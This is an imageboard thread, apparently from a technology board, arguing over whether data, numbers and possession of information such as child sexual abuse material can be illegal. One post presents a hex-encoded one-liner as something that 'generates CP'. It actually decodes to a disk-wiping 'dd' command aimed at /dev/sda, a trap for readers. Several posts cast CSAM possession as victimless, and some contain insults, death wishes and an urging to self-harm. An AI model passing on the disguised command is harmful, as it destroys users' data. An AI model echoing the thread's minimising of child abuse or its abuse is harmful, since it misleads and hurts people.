Certain combinations of 1s and 0s are illegal

>certain combinations of 1s and 0s are illegal

Other urls found in this thread:


>certain things are illegal
wow you're so deep

>certain combinations of carbon, hydrogen and nitrogen are illegal


>certain combinations of atoms are illegal

>certain combinations of syllables are illegal in china

>tfw this thread again

>certain intensities of electric current are 1s and 0s

>specific configurations of periodic electrical impulses are not permissible by statutes decided upon by the governing body of the land

>certain combinations of sticking ur wiener in someone is illegal

>certain combinations of atoms are illegal

>certain numbers are illegal
>do a math problem for homework
>get arrested for possessing CP or creating munitions

>Certain combinations of 1s and 0s, when decoded in a specific way to produce a specific form of digital media, are illegal.
Those same combinations of 1s and 0s are perfectly legal if decoded in a different way.

>certain penetrations are illegal

So you're saying if you have a code you can hid- i mean change the media to a different form


>distribute CP images in txt format
>hurr what did I do wrong officer?

anything can be decoded to cp

>certain combinations of sperms and egg created you


>certain electron movements are illegal

Voltage, not current

whats that?


In these situations it can be argued you were intentionally obfuscating the image data to avoid detection. Allow me to give you an (incredibly oversimplified) example:

let's say, the binary combination 001100101111000001110001, when encoded as png data, produced an image depicting cp. This is illegal. However, let's say the same sequence, when encoded as .mp3, just so happened to be Chopin's Minute Waltz. This is not illegal. This is an incredibly unlikely occurrence, but nonetheless a representative one.

The legality is determined solely by the sequence in its intended final format, the 1s and 0s themselves aren't illegal.

So basically if I rename it from file.png to file.mp3 it goes from being illegal to legal?

Tell that to the police.
>This isn't CP, it's just a core dump I salvaged from a hackathon.


Well, if the voltage stays the same and switches between 0 and some other value, it could still be considered 0's and 1's

except that png files are obviously png files, and will not work if encoded to anything else.

>Yes police officer I know if its a .png it is child porn but all this was meant to be a batch file I swear!

>HDCP master key release

If the information is viable both ways, yes.
In literally all of these circumstances, the information is worthless in any format but the illegal one
Yes, this is largely the reason that certain combinations of numbers can be considered "illegal" to have in the first place. In 99.999999999% of cases it's basically impossible for them to be meaningful in any more than a single case, however that doesn't mean the possibility for a binary sequence to properly represent two different things in two different mediums, one illegal and one legal, doesn't exist.

Neither voltage nor current dictate the existence of electrons in memory. In TTL, however, voltage levels do dictate a high or low state.

That's not how it works user

>the information is worthless in any format but the illegal one
>a tautology is a tautology
If you take an illegal number and transform it in a reversible way (compression, reencoding) it's still illegal.

>/dev/random contains every piece of CP ever created and that ever will be created

In that situation you're simply obfuscating the illegal data.

Allow me to explain it as though to a 5 year old:

It's not the number that's illegal, but what the number represents.
If a number can correctly represent two things, one illegal and one legal, then only the number used in the illegal sense is illegal.

This doesn't mean taking an illegal number and reversing it or re-encoding it makes it legal, because you're still creating a representation of something that is illegal, and that information is only valuable in the illegal form. This really shouldn't be that difficult to understand.

I'm fairly certain I was the first person to make this thread

Allow me to explain it as though to someone who doesn't understand the difference between the law and philosophy:

A number that represents something illegal is illegal, even if it has a legal representation.

>WMD launch password is a 10 digit PIN, this PIN is illegal to possess
>Someone happens to have a 10 digit phone number that is the same sequence as the launch code
>This person and everyone with their contact information should be arrested for possessing an illegal number

Sure thing, user.

What happens if I take for example a pop song, and I create a new extension, that uses that data from the .mp3 and makes it CP?

If you can figure that out without somehow storing the data for the CP then you will have the perfect mechanism for distributing illegal data.

But what would happen to the song? Would it be illegal?

it should be trivial to take 2 random images (a boat and this, for example) and apply a function to turn the first into the second. you can then distribute the original boat image and the function code and people can turn it into the second image themselves

wew forgot to add an image to the reply. either way, point stands.

Congratulations, you're all on a list now.

wew lad i'm on a list because i understand basic math applied to computers. maybe the american gubment can ban math after they ban cryptography

Never said the lists are justified. We're all probably already on a list anyway, for one thing or another.


Im already in the list

we're all just ones and zeroes.
life sure is a strange trip.

>certain combinations of thoughts are illegal

Not yet anyway...

Oh non eff nine

I'm not sure if you're being sarcastic, because everything you said is probably true

>we all are developed fetuses
>having sex with a younger developed fetus is illegal

So say I have an image which translates to a large binary number. Then I could convert that binary to decimal number.

I wonder how many numbers in a number line are CP.

>serveral programming languages have a standard library function that can potentially generate CP

Somewhere between 0 and Graham's number.

I kind of want to make a decimal to image converter now.

>certain combinations of atoms being inserted into another combinations of atoms is illegal

do you think you're clever

Those are physical, numbers are abstract.

An infinite amount, obviously. Number line is infinite.

that's right. We have very absurd laws where victimless crimes of simply possessing information alone are illegal.

isn't on the same level.

is me thinking of kissing you while i penetrate from behind physical or abstract?


>certain combinations of syllables are illegal in america

>certain combinations of adenine, guanine, cytosine and thymine are illegals

Sweet, now we can reverse entropy!

Found the paedophile.

Bet you can't argue it bubby.

Memory is the physical manifestation of 0s and 1s you idiot.

Contrary popular opinion, freedom of speech does not mean it's legal to say anything. Literally certain combinations of audible words are illegal, and that is how it should be. There's really no reason why computer data should be any different.

the problem isn't that some stuff is banned, it's what's banned and who decides it. even with common speak, it's a complicated issue. when you throw in technology on the mix, it becomes much harder, both to define what needs to be banned and to explain to people the intricacies

case in point, the us talking about banning cryptography

`echo "64642069663d2f6465762f7a65726f206f663d2f6465762f7364612062733d3430393620636f756e743d34303936" | xxd -r -p`

This code actually generates CP

>All files are simply numbers, some very large.

Yes I totally agree, even without technology, freedom of speech is still a contentious subject.

I'm just saying anyone who thinks that possessing or distrbuting information should invariably be legal is being completely ridiculous.

Ok, let's say you post something on twitter. What can land you in jail?
Threatening to kill someone?
Spreading lies about something knowingly? (Does this lead to a civil law suit or what?)
Basically everything where authorities expect you to act violent upon but otherwise 'free speech' holds, right?

So what information is illegal alone because you possess it? Isn't saying something different than possessing information? This is though crime shit.

- We have CP townhall.com/columnists/jacobsullum/2014/02/12/looking-vs-touching-is-possession-of-child-pornography-a-crime-worthy-of-years-in-prison-n1793364

I want someone to make some real case for most current laws. Most are just insane bullshit.

- Often information that you possess is illegal because it proves that you did something but having the information alone in form of a digital file isn't (or shouldn't be) illegal because it's not necessarily connected to some action.

- IP laws where you '''''''STOLE''''''' the information like a torrented game or music or something like that. Bullshit laws as well.

I'm trying to think of some examples where I'm really sure that the possession of that information alone should land you in jail.

>a doge picture has more bytes than a googol ^ google.

Really makes you think.

I hope no one actually believes these are legitimate points or anything

Here's a contrived situation for you:

Let's say your country's political leader gets assassinated and it came to light that you possessed all the information necessary to prevent it and you withheld it.

You would certainly be convicted of treason. I would argue rightfully so.

More generally, withholding necessary information from authorities is obviously a crime.

Yeah, but that's an act of withholding information or something like that. You don't need to make 'having exactly that document on your computer' illegal by law.
It's like a tax document that proves you did some tax evasion. Should the tax documents be illlegal? No, you action is illegal.

I think it will end in arguing semantics. But I think my point would be that the information shouldn't be considered illegal when there's obviously the action that's considered illegal. (Not that it matters in a specific case for the one that gets jailed).

In the case of illegal porn or intellectual property, you can certainly argue that the goal of the perpetrators is distribution, so you would be abetting its creation simply by possession. Or at least you would be witholding information by not reporting the source of it.

I'm certainly not saying the laws are perfect, or even reasonable, but they aren't objectively wrong on principle.

Fuck you. I hope you and your fucking nanny state die a horrible fucking death. I hope everyone you love dies in front of you, and this is followed only by 70 more years of life before you die slowly and painfully of old age in a hospital bed.

Free speech sometimes hurts feelings, that's the fucking point.

No one is talking about feelings here.

Do you think fake bomb threats are okay? Or perjury?

Yeah, it's always argued that way because obviously possession of information alone being illegal sounds absurd because it's unimaginable that you storing information in your brain or on a storage device alone could hurt someone. In laws it always seems to be connected with "... you're furthering the emotional harm of x" or "you create demand" etc. The reason these are crimes is because did or didn't do something. The possession alone isn't an act of wrongdoing. At least I don't see it, but it seems like it because what could information being stored do possibly do wrong? Nothing. It's the circumstances around the information and never the information alone that should be illegal.

I see your point, but when the only way to get something is through illegal means, possession alone is enough to prove guilt of a crime. Maybe simply possessing illegal porn isn't itself a crime, but obtaining it is. So the two are always linked.

Ye. But even then you can have differences. For example the guy that pays a someone money to give him CP and they have to go and rape new children. Harm can be argued here. But if he just downloads a random CP image anonymously, the obtaining part is entirely different and becomes very hard for me to argued non-victimless and therefore worthy of punishment.
Like in that article in Basically OP, Q.E.D. and you may continue to question how certain information could possibly be illegal?!

>certain combinations of 1s and 0s are illegal

>certain movements of current along the human nervous system are illegal
>certain communication of neurons via axons in the soft grey matter of the human brain are illegal


>applying pressure to certain parts of a gun can land you in jail

You can totally argue that anonymously downloading something has victims, especially if you don't report the source. Maybe the punishment isn't in line with the crime, but it is absolutely a crime.

I was talking about a specific CP example. Do you mean in general? Because then I agree and we're back to your assassination example.
>but it is absolutely a crime.
That's a tautology. I would be a crime because the law says so.
It depends on the specific example where anonymously downloading something should be a crime.


>certain combinations of people and my dick are illegal

as in a child's genitals are replaced with your dick?



>a single hole drilled into the lower receiver of an AR-15 can land you 5 years in federal prison

>civtimless crimes
>child porn is victimless
fucking roflmaod out loud in real life
go hang yourself, you deluded cunt

Naw senpai